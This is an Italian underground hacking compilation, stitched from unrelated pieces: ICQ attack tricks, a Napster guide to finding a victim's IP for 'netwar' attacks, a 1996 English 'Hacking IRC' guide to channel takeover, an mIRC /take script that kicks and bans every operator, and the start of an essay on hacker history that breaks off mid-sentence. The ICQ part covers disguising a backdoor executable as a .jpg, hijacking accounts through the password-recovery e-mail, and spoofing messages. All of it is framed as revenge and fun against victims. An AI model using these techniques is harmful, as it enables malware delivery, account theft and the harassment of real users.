qualcuno, puoi vedere il nome del file in una piccola casella di testo all'interno della finestra di dialogo della richiesta. Ma cosa succede se il nome del file troppo lungo per essere mostrato? Facciamo una prova. Prendi un file eseguibile chiamato "file.exe" (NO, NON IL SERVER DI NETBUS! :)) e cambia il suo nome in "file.jpg .exe" (sempre senza virgolette, naturalmente). Manda wuesto file a qualcuno su ICQ. Visto che il nome del file troppo lungo per essere mostrato, la piccola text box mostra solo quello che puo', nascondendo la parte " .exe" agli occhi della vittima. Il destinatario ricever il file senza pensarci due volte (cio, solo un'innocente immagine .jpg! ;-)) e magari lo eseguira' direttamente... praticamente si puo' preparare, *ad esempio*, un server di backdoor dandogli anche l'icona di un file di testo e rinominandolo come "sex-story.txt exe". Quindi, la prossima volta che ricevi un file da qualcuno su ICQ, pensaci due volte prima di aprirlo... ;) Smascherare gli utenti invisibili ================================= ICQ ha una funzione chiamata "invisible list". Chiunque tu inserisci in questa lista non potra' vedere se sei offline o online, anche se sei nella sua contact list. Se qualcuno ti mette nella invisible list e vuoi vedere se online o offline, basta fare cosi': (a) Trova il suo UIN (supponiamo sia 5917057). (b) Vai a www.icq.com/5917057 (c) Cerca una piccola immagine che dice se online o offline. Cos' questa cosa, chiederai? E' un opzione chiamata web aware. Permette a persone che non hanno ICQ di vedere se sei online o offline. E' anche necessaria per i "web pagers" di ICQ (del codice che piazzato in un documento html permette a chiunque di mandarti un messaggio su ICQ o di vedere se sei online o offline, senza la necessit del client ICQ). L'opzione web-aware puo' essere settata ad off usando il menu' delle preferenze. Se lo fai, le persone che andranno su www.icq.com/TUOUIN vedranno un immagine con scritto "disabled" al posto di "online" o "offline". Anche se la tua vittima setta ad off il web-aware, puoi sempre fare in modo da svelare la sua presenza online. Ad esempio: di solito basta provocare qualcuno con insulti e simili per vedersi rispondere. Inoltre, puoi registrare un altro utente ICQ (ci vogliono 5 minuti), in aggiunta a quello "regolare", e quindi passare a quello e aggiungere questa persona. Non comunicare con questa persona mentre usi quest'altro account. Probabilmente si dimenticher presto di questo "utente silenzioso" e non perder tempo a metterlo nella invisible list. Fatto cio', potrai poi passare all'altro utente quando vorrai e vedere se la vittima online o meno... Scoprire passwords ================== Se ti trovi ad aver i files del DB di qualcuno, puoi facilmente scoprire la sua password. Le passwords sono in chiaro nei file .dat (ndT: nella versione 2000, invece, mi sebrano criptate :(( - cmq ci sono sicuramente tools che le decriptano, provate a cercare su astalavista o piu' in la' nella sezione filez del sito). In piu', alcune persone scrivono falsi indirizzi e-mail nelle loro info, come fuck-off@hotmail.com, fake@not.real.com ecc.. Nel primo caso (fuck-off@hotmail.com), puoi provare a vedere se fuck-off@hotmail.com appartiene a qualcuno. In caso non appartenga a nessuno, registralo e poi vai a www.icq.com e cerca il link "forgot your password?". Inserisci l'UIN della vittima, e la password sar mandata al "suo" indirizzo Email (fuck-off@hotmail.com). Poi, accedi al tuo account di hotmail e attendi la password nella tua inbox... ;-) Ecco un altro esempio: la vittima inserisce fake@pentagon.com come suo indirizzo Email. Fortunatamente non ha scritto pentagon.gov, perch pentagon.com sta distribuendo indirizzi email gratuiti (per quanto ne so). Basta registrare fake@pentagon.com e prendere la sua password. Se la tua vittima scriva qualcosa come: fake@not.real.com, puoi sempre registrare real.com per 70$, registrare il subdomain not.real.com, installarci un POP3 mail server e registrare l'account "fake"! Non una soluzione semplicissima e probabilmente nessuno farebbe nulla del genere per avere la password di ICQ di qualcuno, ma.... In piu', puoi sempre provare a indovinare/forzare la password, anche se puo' volerci tempo. Avete notato che la lunghezza massima di una password di ICQ 8 caratteri? Perch una cosa interessante? Qualche tempo fa, nel 1997, potevi usare un clone Linux di ICQ (la Mirabilis non ha rilasciato una versione ufficiale di ICQ per Linux, quindi l'unico modo per usare ICQ sotto Linux usare un suo clone, cio un programma che usa il protocollo di ICQ e offre le funzioni di ICQ, ma non una release ufficiale) per accedere agli accounts di qualcuno senza bisongo di password. Come? Alcuni cloni di ICQ per Linux non obbligavano l'utente ad avere una password di piu' di 8 caratteri. Ma se provavi a fare il login come qualcun altro ed inserivi una password piu' lunga di 8 caratteri, saresti incappato in un buffer overflow che avrebbe fatto semplicemente saltare la verifica della password. Un buffer overflow, in breve, avviene quando un programma assegna ad una certa cosa una determinata area di memoria e si fa eccedere la dimensione di quella cosa oltre quel limite di memoria assegnato. Puo' succedere di tutto, e in questo caso fanno semplicemente saltare la fase di verifica della password. Comunque, questa falla stata riparata. Peccato ;))) Note Finali =========== Usarlo o non usarlo? -------------------- C' molta gente che non usa ICQ o altri instant messanger per motivi di sicurezza. Puoi anche evitare di usare la posta elettronica per evitare il mailbombing o allegati potenzialmente dannosi, rifiutare di navigare sul web per la paura di giungere su una pagina ostile, non andare mai su IRC per paura di essere nukati ecc. Io non credo che la soluzione migliore sia semplicemente "evitare". Se sei di fronte ad un problema di sicurezza documentati e fai del tuo meglio per metterti al sicuro. Spero che, ad esempio, userai le informanzioni che hai ottenuto da questo documento per mettere piu' al sicuro possibile il tuo client ICQ, non che impaurito pensando a quello che potrebbero farti corri a disinstallare ICQ. Far girare ICQ sotto Linux -------------------------- ICQ per Windows 3.11, ICQ per Windows 9x, ICQ per Windows NT, ICQ per Mac, ICQ per Java... cosa? Niente ICQ per Linux? Una versione di ICQ per Linux era stata annunciata, ma non mai arrivata. Come mai? Forse la Mirabilis non riuscita a convertire ICQ per Linux? :) In tutti i modi, se vuoi usare ICQ sotto Linux, puoi A) Scaricare ICQ per Java, ed una Java Virtual Machine per Linux. Lancia la JVM e facci girare ICQ per Java. B) Vai a www.linuxberg.com, nella pagina "software", trova la pagina di ICQ e troverai una lista di cloni di ICQ per Linux. A proposito delle "Catene di S.Antonio" di ICQ ---------------------------------------------- Aggiungo una nota divertente a riguardo delle stressanti catene di messaggi d ICQ... credo sia inutile dire che sono tutte cazzate, non ho mai forwardato nessuno dei messaggi minacciosi che periodicamente si ricevono da chi non ha nulla da fare tramite ICQ, ma sono ancora vivo :))) Se poi vuoi farti una risata alle spalle di chi ti ha inviato il messaggio, potresti mandargli una cosa del genere: Questa una catena di messaggi di ICQ. Non fermare la catena! Cindy di Sydney ha mandato questa lettera a 49 milioni di persone ed diventata la regina dello Zaire! Masha dalla Russia ha forwardato questo messaggio a 23.7 milioni di persone, ed andata sulla luna come astronauta! Gil dal Brasile non ha forwardato questa lettera e si trasformato in una rana!! Chan dal Giappone ha forwardato questa lettera a 107000 persone ed diventato il campione mondiale di Pokemon e PacMan!!! Se forwardi questa lettera 1-5 volte: 1-5 persone se la prenderanno con te per avergli mandato questa stupida lettera! Se forwardi questa lettera 6-10 volte: 6-10 persone se la prenderanno con te per avergli mandato questa stupida lettera! Se forwardi questa lettera 11-15 volte: 11-15 persone se la prenderanno con te per avergli mandato questa stupida lettera! Se forwardi questa lettera 16-20 volte: 16-20 persone se la prenderanno con te per avergli mandato questa stupida catena! Ci voleva una cosa stupida in una guida seria, no? No? Ok, la prossima volta non ne inserisco :) Appendice A: Trovare quella piccola porta da solo ================================================= Si'. Puoi trovare la porta di ICQ da solo, piu' velocemente che usando qualsiasi tool e con maggiore soddisfazione personale :). Come? Semplice. Ricordate il modo per ottenere l'IP su ICQ? Ottenere la porta praticamente la stessa cosa. Una volta che hai trovato l'IP hai anche la porta affianco. Le connessioni, con Netstat sono mostrate dal loro IP, la porta locale e la porta remota, quindi devi solo trovare l'IP del tuo obiettivo. Vedrai: suo-IP:la-porta. Basta guadare dopo i ":" ed ecco la porta. C' anche un modo piu' semplice per fare cio'. Leggi l'appendice B per sapere qual Ringraziamenti a Zero Alpha per l'idea di questo trucco. Appendice B: I vantaggi dei cloni Unix di ICQ ============================================= I cloni di ICQ hanno solitamente meno fuzioni della release ufficiale, ma a volte hanno delle nuove funzioni come un'opzione del menu che aggiorna tutte le info dei tuoi contatti, un bottone che cerca un altro server vicino se non riesci a connetterti a quello che usi normalmente ecc. Inoltre, la maggior parte degli ICQ mostrer l'IP e la porta del contatto in un nuovo campo della pagina info, ti permetter di aggiungere utenti senza bisogno di autorizzazione e senza avvertirli che sono stati aggiunti. Alcuni cloni, poi, hanno anche uno spoofer incorporato! Appendice C: conversione IP ==> UIN da te stesso ================================================ Supponi che qualche lamer ha appena provato a nukarti. Il tuo firewall ha fermato il DoS. Tu vuoi chattare con l'idiota per dirgli quanto stupido... ma hai solo il suo IP (nel log del firewall, naturalmente). Nessun problema: se il lamer ha ICQ puoi avere il suo UIN abbastanza facilmente. Ci sono infinite ragioni per le quali vorresti sapere come convertire l'IP in UIN. Vediamo come fare. Questo trucchetto abbastanza semplice. Prima di tutto, prendi un message spoofer. Poi, settalo con l'IP dell'obiettivo, e manda un messaggio col tuo IP come sorgente. Ad esempio, se il tuo UIN 5917057, devi spoofare il messaggio da quell'UIN. Nel messaggio, dovresti inserire qualcosa che venga risposta di sicuro. Puo' essere qualcosa di offensivo, o qualcosa di interessante... magari un "Ehi, ho una sorpresa per te..." . Ora supponi che l'obiettivo risponda al tuo messaggio, Dove credi che arrivi la risposta? A te, naturalmente! E' il tuo UIN quello che hai usato come sorgente per lo spoofing, no? Ora che hai ricevuto il messaggio dalla tua vittima, hai anche il suo UIN ;) Appendice D: Divertirsi con le contact list =========================================== Come gi scritto, se a qualcuno fai aggiungere se stesso in lista, perder la sua contact list a meno che abbia la patch contro questo buco. Ho gi spiegato come farlo con uno spoofer, ora vediamo un altro modo. Prima di tutto, devi avere questa persona nella tua contact list. Poi, cambia il suo nome nella contact list e mandagli il contatto. Gli apparir come un'altra persona, e se accetta il contact fregato, poich avra effettivamene aggiunto se' stesso in lista. Per proteggert da questi espedienti, installa la patch che ti permette di aggiungere te stesso in lista - o stai attento ai contact che ti mandano :) La persona che ha tirato fuori questo trucco Dr. Virus. Appendice E: Trucchi incredibili col protocollo di ICQ ====================================================== Immagina di poter entrare in una conversazione fra altri utenti senza permessi, di poter ottenere IP, porta e tante altre informazioni in pochi secondi... tutto il potere sul sistema che potresti desiderare... puoi ottenerlo imparando il protocollo di ICQ. Possono farlo anche altri, e usare quella conoscenza contro di te. Non farti cogliere impreparato ;) Impara qui il protocollo di ICQ: http://www.student.nada.kth.se/~d95-mih/icq/ Prova dei programmi che possono mostrare cosa puoi fare e poi vai alla fonte... http://www.hackology.com/~ewitness/ Fine... per ora. Ghent... WAR ON NAPSTER Sollecitato dalla sezione "Trucchetti" edita da "Syn^" vorrei donare il mio piccolo contributo. I due pi famosi servers per "chattare" sono indubbiamente IRC e ICQ. Ma sicuramente da due anni a questa parte molti di voi si saranno imbattutti, in un Server che unisce l'utile al dilettevole: Napster. E altrettanto sicuramente, molti di voi avranno subito i soliti attacchi presenti anche su IRC e ICQ. I programmi di netwar sono ormai risaputi, e analizzati esaurientemente in uno dei capitoli editi, ma potra' forse risultare oscuro, come trovare l'IP del simpaticone (la vittima). Beh, seguite i miei consigli: 1- Aggiungete il simpaticone nella "Hotlist", clikkando con il destro sul suo nome, 2- Andate su "Hotlist", selezionate la vittima; compariranno le canzoni da lui possedute. 3- Fate doppio click su una di esse e scaricatela, 4- Una volta iniziato il downloading, aprite una finestra DOS, 5- digitate: netstat -n 6- compariranno 2 colonne di indirizzi IP: quella a sinistra mostra il vostro, quella a destra mostra l'IP della vittima, 7- scegliete l'ultimo IP in basso (della vittima), che dovrebbe avere a fianco la scritta ESTABILISHED. 8- A questo punto aprite un qualsiasi programma di netwar che richieda l'IP e divertitevi (o vendicatevi). Nota: Pu capitare che ESTABILISHED non compaia, ma ci sia al suo posto un altro messaggio, in quel caso decifrare il messaggio e scegliere il provvedimento pi opportuno. (Es. TIMEWAIT) Questo scritto il contributo di "Anomalia" che potete trovare su mIRC (#italiahelp #Arese) Ringrazio "Syn^". _____________________________ __________________________ HACKING IRC - THE DEFINITIVE GUIDE Copyright 1996 klider@panix.com Welcome to Hacking IRC- The Definitive Guide. The purpose of this page if you have not already guessed is to provide what I consider optimal methodology for hacking IRC channels. In addition, I provide some of the better channels to hack as well as fun things to do while "owning a channel." Contents * Section 1-- Why Hack IRC? * Section 2--Requisite Tools * Section 3--What It Takes To Gain Control * Section 4--Link Looker(LL) * Section 5--Bots and Scripts * Section 6--Multi-Collide-Bot(MCB) * Section 7--Pre-Takeover Preparation * Section 8--Thing To Do ONce You "Own" the Channel * Section 9--Best Channels to Hack [Image] See me if you dare. Section 1-Why Hack IRC? I have often asked myself this question and the answers are varied and numerous. One of the primary reasons for hacking IRC channels is due to shear boredom. However a multitude of secondary reasons exist. Foremost among these is the "that asshole op i nsulted me and/or kicked me and/or banned me from the channel and I WANT REVENGE! This is a perfectly valid excuse and boredom is not a necessary condition for implementing a takeover of an IRC channel. Nor is it a necessary condition that the reason yo u were insulted and/or kicked and/or banned was because in fact you are an asshole. All that is necessary is the will, the desire, a bit of skill, and of course the tools, which convieniently brings me to my next section. Section 2-Requisite Tools Any decent craftsmen needs a good set of tools and IRC hackers are no exception. Without the proper tools you are dead in the water. All of the tools I describe below are available on public ftp sites. Before I launch into a discussion of what you wil l need, it is important to point out that if you are reading this document from your ppp/slip account you might consider geeting a shell account if you are serious about hackin. Hacking IRC from a slip/ppp is much more complicated than doing so from a sh ell account. There are those who will debate this but my experience has shown that mIRC or any of the other shareware IRC programs for the PC are no match for the speed and ease of use that an IRC shell script allows for. Thus the first tool required fo r hacking is an excellent irc shell script. If you have already used IRC via a shell account and are still reading this document you probably already have a script, which means you are well on your way! As far as IRC shell scripts go, my personal favor ite is Lice - again available publically via ftpFTP. Other scripts exist but the richness and power of the LICE commands I believe is second to none. Now while it is possible to stop here and hack ops with just a script, you would effectively be putting yourself needlessly at a handicap. Therefore I reccommend these additional two tools: 1)Multi-Collide-Bot(MCB) and 2)LInk Looker(LL). These two C programs are your infantry and intellige nce respectively. Again both are available via FTP and both are C programs and therefore need to be compiled. Section 3 - What It Takes To Gain Control Without going into much detail clearly in order to effectively gain control of an IRC channel you must be the only op on your channel. If you are still clueless at this point, that is to say..You should be the only guy/gal with the @ in front of your nic k. Once you have accomplished this, the channel is YOURS. Of course, that is until it is taken back or you decide to cease hacking the channel. There are a number of ways to effectively gain ops on a channel and I will start with the simplest, then mov e to the increasingly more complex and finesse laden methods. By far and away the easiet method of gaining ops on a channel is to ask. You laugh eh? Well don't. Clearly as hackers grow more prevelant on IRC the asking method becomes more and more unlikely to succeed. This is especially true of the bigger and well established channels that have cultures onto themselves such as #Netsex, #Teensex, #Windows95, #Bawel, #BDSM, #Blaklife, #Texas, #Hack, and any of the #Warez channels and a whole host of others. To gain ops in these channels you must become a channel re gular (i.e. one that hangs there freqently and becomes a known and trusted member of the channel). Since you have neither the time nor the desire to make friends on the channel you ultimately want to hack ops on, the asking method is the last thing you want to do on all but the smaller more ethereal channels, where you obviously stand a better although still slim chance of gaining ops through a request.. One important exception to the ask method is through the use of anonirc which can be used on any ch annel but has severe limitations..more on this later. But of course you didn't come this far to be taught how to ask for ops..so lets proceed with the next lesson. Aside from asking there are essentially two other ways of gaining ops. The first is through splits and the second is through anonirc. The following discussion mostly relates to splits but I will touch on anonirc briefly at the end. What is a split? A split occurs when the IRC server you are communicating on detaches from the rest of the net. If you are in a channel and by chance the only one on a particular server that splits away, you will not only find yourself alone on the channel, but will now ha ve the opportunity to gain ops. In order to do this you need to leave and rejoin the channel in which case you will now find yourself with the little @ in front of your nick. When your server rejoins you will have ops on the channel. Now you say, "Wow, thats easy enough". Wrong. More likely than not, especially on a bigger channel a number of things are likely to occur that will remove your op status. Remember now the goal here is to keep ops so you can "Have Your Way". Also and more importantly, if you go into a channel and wait around hoping the server you are on splits, you might grow old and die first. Therefore, what is a wannbe IRC hacker to do? Link Looker is your answer. Section 4 - Link Looker Link Looker is a lovely little program that acts as your intelligence officer. Without getting into the complexities or its mechanics, what it effectively does is to give your a message anyti me a particular server detaches from the net and a message when it rejoins. Is the methodology becoming clearer now? Yes! Thats right! When LL tells you that a server is split ,you connect to that server and join the channel you seek to hack ops on and h ope nobody else split from the channel on that server(if this occurs you will not get ops).. If you find yourself alone, you will have ops and a fighting chance to gain control of the channel. It is important to realize that on many channels, just getti ng ops via a split and waiting for a rejoin is sufficient for gaining control of a channel. This is particularly true of small to medium sized channels as well as channels that are not organized or do not have Bots (more on this later), You simply wait for the server to rejoin and once the channel is full you execute your mass deop command (this is on your script and the key element in getting rid of any other ops) and you will be the only op left. The channel is yours and go do your thing! On bigger more organized channels, things won't be so easy due to the presense of Bots as well as the presense of scripts used by existing human ops. Section 5 - Bots and Scripts Bigger more organized channels inevitably have a Bot(Robot) or multiple Bots. Bots are essentially suped up scripts that attempt to maintain ops on a channel by their continuous presensce on channel. Additionally Bots provide a number of channel mainten ance tasks such as opping known members of the channel (either automatically or through password requests), providing notes, and other information. Bots however are primarlly used for keeping ops on channel and depending on the type of Bot, defending aga inst IRC hackers. Bots come in many varieties and types but the best of them do a good job of deoping spliters(thats you silly..you are opped on a split and when you rejoin the bot will deop you). Not only will Bots deop you..many of the human ops have scripts (such as LIce) that depending on the settings employed will deop you as well. Now with the prevalance of powerful scripts on IRC a recent phenomona is the occurse of the desynch. This is a nasty event that takes place when you rejoin from a spli t and your script deops the existing ops and the existing ops deop you at the same time. What this does is confuse the shit out of the servers and cause them to desynchronize from one another. This is to be avoided at all costs. When this happens you will effectively become desynched from a large portion of the net and most the channel, (depending on what server you rode in on). What's worse is that you will think you have ops( which you will for that server) but in reality you won't and you will be w asting your time. So how with the prevalence of super Bots and Human ops with scripts do you take the channel? Using MCB of course! Section 6 - Multi-Collide-Bot(MCB) Multi-Collide-Bot (MCB) is a powerful tool and your best friend. MCB is an even lovelier program that creates a clone of a nick you want to kill (almsot always an op on the channel you are tr ying to hack) on a server that has split(yes the one Link Looker informed you of). Basically you feed MCB the name or names of the nick you want to kill and tell it what split server to establish those clones and upon rejoin.BAM/SMACK/KIILL!! Yes thats r ight, the target is thrown out of the channel(losing ops) and must re-establish a connection with a server to get back onto IRC and into the channel. So yes, you have figured it out. If you kill all of the ops on a channel and you ride in on a split you will be the only op in the channel. Let me assure you there is nothing like seeing the nick kill messages of the ops you have targeted as you ride in on the split. Section 7 - Pre-Takeover Preparation There are a number of things you can do before you attempt to take over an IRC Channel to make things easier and be as well prepared as you can possibly be. 1)Pre-Attack Observation. Plain and simple you must know who you are attacking. One of the most important things you can do as you sit and observe the channel is to determine which bots and/or human ops are deopping on rejoins. These are the nicks you want to target first. You will fail if you don't kill these nicks and rejoin because you are lik ely to cause a desynch(discussed above). However, it is essential to make sure you kill all of the ops. Leaving just one op alive means you have lost that battle and must now regroup and wait for another split. It is important to watch out for ops chan ging their nicks if they detect a split. If they do this, the mcb you tagged with their nick will be useless to you. The way I prevent this is to be on both sides of the split. That is to be opped in the channel on the split server and have a clone in the channel on the other side of the split monitoring the goings on, telling you if ops change nicks or new people are opped (in which case you create a new mcb with their name on it). Section 8 - Things To Do Once You "Own" the Channel Once you own the channel, the decision is clearly yours on how you want to proceed and needless to say the number of things you can do is endless. However, let me share with you a number of time tested ideas that are sure to give you a thrill not to ment ion totally piss of the channel you have now hacked. The first thing you can do is to taunt the former ops of the channel. That is to say, they will probably be cursing you and telling you what a loser you are for hacking the channel. They will say thi ngs like "get a life, do something more productive". Remember don't take it personally. You have to keep in mind that it is the formers ops who in fact are the ones who need to get a life, considering the only power they have or make that had (if you su ccessfully hacked the channel) was to have ops in the first place. So you can continue to taunt and if they get relay billegerent you can kick them off the channel. They will undoubtedly come back within a second or two and then you can say something li ke, "Now, now I am in control of the channel and I will not tolerate such language and behavior. If you are unable to control yourself I will be forced to ban you." Now this is sure to get some violent response from the former op in which case you subse quently kick and ban them and move onto the next person. Another thing I like to do is to word ban. This is particularly easy if you have LICE. What you do is pick a word that if typed onto the screen by any of the channel members, will automatically r esult in you kicking them off the channel with the reason that word is banned. This method is particularly good in channels like #teensex where people are always saying the word sex, male, female, teen, age, etc. All you do is ban those words and watch the kicks begin to fly. Another thing I like to do is moderate the channel. What this does with the /mode +m command is to make it such that nobody on channel can speak. This is a particularly good thing to do when many of the channel members are getti ng out of hand and you want to make some sort of statement without anybody interrupting you. Yes all eyes will be trained on you. If you want to be really mean, when you are finished hacking the channel, you can leave it moderated in which case nobody w ill be able to speak and the channel is effectively shut down. Other things to do which are nasty as well are to kick everybody out of the channel and make it invite only, effectively shutting it down as well. Think of your own creative things to do. I would love to hear about them..email me..if they are particularly interesting I will include them in this page with an attribution if you like. Section 9 - Best Channels to Hack #limbaugh #rush #lamerz #newbies email klider@panix.com Piccola aggiunta: Hola raga sono io, per il takeover, non vi scomodate a scriverlo ve lo do' io. Sbattetelo negli Aliases, il comando /take , Naturalmente dovete avere l'op!! Buon takkaggio e attenzione, levate tutti i vostri identificativi prima di farlo!! _________________________________INIZIO CODICE_______________________________ take { if $me !isop $chan { echo -a *** Non sei op | halt } else { mode $chan +i set %iozzo 1 set %iozzo.opnick $nick($chan,0,o) if %iozzo.opnick == $null { echo -a *** Non ci sono ops! | goto end } :next if %iozzo <= %iozzo.opnick { if $nick($chan,%iozzo,o) == $me { inc %iozzo | goto next } else { kick $chan $nick($chan,%iozzo,o) Take ban $chan $nick($chan,%iozzo,o) 2 mode $chan +i inc %iozzo goto next } } :end mode $chan +i unset %iozzo.* } } _________________________________FINE CODICE E ARTICOLO_______________________________ HACKERS versione 0.3d INDICE 1. INTRODUZIONE 2. IN ORIGINE 3. HACKER = CRACKER ? 4. ESISTE UNA ORGANIZZAZIONE? 5. CYBERPUNKS 6. MANIFESTO 7. ALTRI LINK UTILI A. INTRODUZIONE A GNU B. LICENZA D'USO C. BIBLIOGRAFIA 1. INTRODUZIONE "Hackers." Questa parola assume significati differenti in funzione delle persone a cui lo chiedi. Al CERT, il Computer Emergency Response Team della Carnegie Mellon University di Pittsburgh (http://www.cert.org/), potrebbero dire che un hacker e' colui che penetra nei computer altrui. Nello stesso tempo - pero' - Richard Stallman, fondatore della Free Software Foundation (http://www.fsf.org/), si definisce un hacker. Per lui "hacking" significa sviluppare software in un "open, collaborative environment", con un forte senso etico per cio' che e' giusto o sbagliato (informaticamente parlando). Usando questa accezione il New Hacker's Dictionary di Eric S. Raymond (http://www.tuxedo.org/~esr/jargon/html/index.html) definisce un hacker come qualcuno che ama esplorare le possibilita' offerte da un sistema informativo e mettere alla prova le sue capacita', in contrapposizione con la maggior parte degli utenti che preferisce apprendere solo lo stretto indispensabile. Una nota rivista underground recita Hacking, hackers, hack-- in qualsiasi forma, non sono altro che i test di Rorschach del cyberspazio quelloche pensate significhi il termine hacker rivela tanto di voi quanto degli hacker stessi. Gli hackers sono buoni? Sono cattivi? Tutto dipende dalla accezione del termine che volete usare.. Altre definizioni largamente usate sono Hack L'arte di fare qualcosa quando non vi e' alcun modo noto per farla. L'arte di fare qualcosa che non puo' essere fatta. L'arte di fare qualcosa che e' completamente totally against the odds. Hacker Colui che riesce a farcela contro ogni probabilita'.. Colui che riesce a trovare IL MODO in un gioco che non puo' essere vinto. Colui che insegna agli altri e che diffonde il sapere anche quando nessuno vuole ascoltarlo. Colui che non molla. Colui che affronta i propri avversari anche quando lo superano per numero. Questo documento - che si sviluppa su un paragrafo della Guida ad Internet e alla Realta' Virtuale dello stesso autore - cerca di chiarire il significato piu' esteso di questi termini. 2. IN ORIGINE Il termine Hacker definiva in origine i maghi del computer, programmatori in grado di risolvere ogni problema programmatori e progettisti di computer che considerano l'informatica come la cosa pi importante al mondo. Nel parlare con questi esploratori digitali, da quelli che negli anni cinquanta, domarono macchine da decine di milioni di dollari, fino ai giovani maghi contemporanei che dominano le proprie macchine nelle loro camerette di periferia, si scopre un elemento comune, una filosofia condivisa che pare legata al flusso elegante della logica dello stesso computer. E' una filosofia di socializzazione, di apertura, di decentralizzazione e del mettere le mani sulle macchine a qualunque costo, per migliorarle e per migliorare il mondo. Come racconta Steven Levy nel suo libro HACKERS (che consiglio caldamente), tutto e' iniziato grazie ai trenini elettrici. Verso la fine degli anni 50, infatti, un gruppo di studenti del MIT fondo' il Tech Model Railroad Club (TMRC). Si trattava di un club di appassionati di modellismo che pero' non si limitavano a costruire locomotive e vagoni, ma anche di farli funzionare su una rete ferroviaria in miniatura, perfettemente riprodotta. La complessita' del sistema poneva agli studenti problemi sempre piu' complessi trovare i pezzi, far funzionare insieme apparecchiature che non avevano niente in comune. Queste stesse persone, appassionate di tecnologia, utilizzarono lo stesso approccio nei confronti dei primi (supercostosi) computer che le universita' misero a disposizione. Con un background di questo tipo fu naturale che le cose presero una certa piega.... A questa prima generazione di hackers animata dal motto INFORMATION WANTS TO BE FREE e dalla convinzione che la tecnologia dovesse essere diffusa in ogni ambito segui' quella dei cosidetti homebrewer - appassionati di hardware il cui obbiettivo era provocare lo sviluppo dell'informatica rendendo libere le architetture delle macchine e le specifiche tecniche per realizzarle. A questo mondo appartiene Wozniak - inventore del primo computer della Apple. 3. HACKER = CRACKER ? Oggi spesso il termine hacker viene utilizzato con un significato negativo. Gli hackers, infatti sono anche i pirati cibernetici che entrano nelle banche dati altrui facendosi beffe dei sistemi di sicurezza. In realta' il termine piu' corretto per identificare questo gruppo di individui e' crackers, ma spesso i due termini vengono confusi. Ecco quanto RMS (un vero hacker) scriveva al Wall Street Journal relativamente all'uso improprio che i giornalisti fanno del termine --- Spettbile Editore Le scrivo questa lettera non perche' sia pubblicata, tuttavia - se crede - potra' pubblicarla. E' indirizzata specificamente a Lei, l'Editore, e non ai suoi lettori. Io sono un hacker. Cio' significa che amo giocare con i computer -- lavorarci, apprendere il loro funzionamento, e scrivere programmi ben fatti. Io non sono un cracker; Non passo il tempo a violare la sicurezza dei computer. Non c'e' niente di cui vergognarsi nel hacking che faccio. Ma quando dico alla gente che sono un hacker, la gente pensa che sto ammettendo una nefandezza -- perche' i giornali come il vostro usano erroneamente la parola "hacker", dando l'impressione che significhi "security breaker" e niente piu' Lei procura agli hackers una brutta fama. La cosa piu' triste e' che questo atteggiamento viene perpetuato deliberatamente. I Vostri reporter conoscono la differenza tra "hacker" e "security breaker". Loro sanno come distinguere ma voi non lo consentite! Voi insistete ad usare "hacker" in senso peggiorativo. Quando i reporter usano un'altra parola, voi la cambiate. Quando i reporter cercano di spiegare l'altro significato, voi tagliate. Ovviamente, avete un motivo. Dite che i lettori si sono abitiuati a usare il significato negativo della parola e quindi non si puo' piu' cambiarlo. Beh, non e' possibile cancellare gli errori del passato; ma non c'e' nessuna scusa per ripeterli domani. Se io fossi quello che voi chiamate un "hacker", a questo punto cercherei di forzare i vostri computer e di mandarli in crash. ma sono un hacker, non un cracker. Io non faccio questo genere di cose! Ho abbastanza computer con cui giocare a casa e al lavoro; Io non ho bisogno dei vostri. Inoltre non e' mia abitudine rispondere agli insulti con la violenza. La mia risposta e' questa lettera. Dovete delle scuse agli hackers; ma piu' di cio', ci dovete del normale rispetto. ---- EOF Gli antenati dei crackers erano i phone phreakers, che alla fine degli anni Settanta, in lotta contro le compagnie dei telefoni, imitavano i segnali d'accesso delle reti telefoniche per telefonare gratis in tutto il mondo. Tra questi il piu' famoso e' John Draper (alias Captain Crunch) inventore della blue-box. Con l'arrivo dei primi personal computers, ecco nascere una generazione di ragazzini terribili (come l'eroe del film War Games), per i quali non c' codice segreto che tenga. Alcuni come Robin Tappan Morris, inventore di un terribile virus che nel 1988 distrusse le banche dati di varie universit americane, sono geniali sperimentatori, travolti dai loro stessi esperimenti. Altri, come il tedesco "Pengo", che rubava informazioni segrete e le vendeva ai sovietici, usano la loro attivit per pratici scopi criminali. 5. ESISTE UNA ORGANIZZAZIONE? Durante il DefCon 5 (1997) Ira Winkler (direttore del NCSA) ha dato la seguente descrizione dell'universo underground (cioe' di come strutturata la comunit degli hackers/crackers a livello mondiale). Si stima che a livello mondiale esistano all'incirca 200/300 individui che conoscono a fondo il funzionamento dei kernel dei principali sistemi operativi, dello stack TCP/IP, dei router, e dei firewall e che vi lavorano attivamente sviluppando programmi in C in grado di testare eventuali problemi di sicurezza e di creare le opportune patch per superare questi limiti. Questi programmatori sono in continuo contatto tra loro, si scambiano informazioni, comunicano le loro scoperte ad istituzoni quali il CERT (=Computer Emergency Responce Team) e producono documentazione molto tecnica e che contiene le informazioni essenziali. Attorno a questi 200 guru gravitano circa 2000 programmatori e system administrator (skilled people) che sono ingrado di capire ci che dicono i 200. Questo gruppo di persone analizza la documentazione prodotta dai 200, provano i programmi da loro sviluppati su altri sistemi operativi, li migliorano, scrivono a loro volta altri programmi pi semplici da usare e producono della documentazione decisamente pi articolata che spiega in dettaglio qual'e' il problema che esisteva, dimostra come sfruttare il bug a proprio vantaggio e fornisce una soluzione oppure indica la direzione nella quale lavorare per poterlo risolvere. Generalmente i programmi sviluppati a questo e al precedente livello sono distribuiti gratuitamente (nel miglior spirito hackers) e possono essere usati sia per testare i propri sistemi e migliorarli, che per penetrare in sistemi altrui. L'uso che verr fatto del programma dipende dallo spirito e dall'etica del singolo individuo. In generale (a qualsiasi livello) l'unica legge universalmente accettata da tutti gli hackers il diritto alla libera circolazione delle idee. L'hacker alla continua ricerca dela conoscenza... per questo motivo, egli prova, scrive codice, raccoglie e scambia diligententemente informazioni al fine di conoscere tutto ci che possibile sapere. Attorno a questi 2000 programmatori esite un vasto gruppo (tra i 20 e i 75 mila) che Winkler definisce clue-less (incapaci) che sfruttano le informazioni e i prodotti diffusi dall'anello precedente per propri fini personali. Si tratta di persone con discrete conoscenze dei sistemi operativi ma con scarse doti di programmatori. Lo scenario per, afferma Winkler, e' ancora pi complicato. Fino ad ora abbiamo descritto ci che presente sullo scenario pubblico. La sicurezza informatica, la penetrazione in sistemi informativi aziendali e/o governativi, tuttavia, interessa anche ad altre realt le agenzie governative, i servizi sergreti, l'esercito e le ambasciate (FBI, CIA, NSA, NATO, NASA, i servizi segreti israeliani, il Japanese immigration plan...) hanno anche loro un pool di 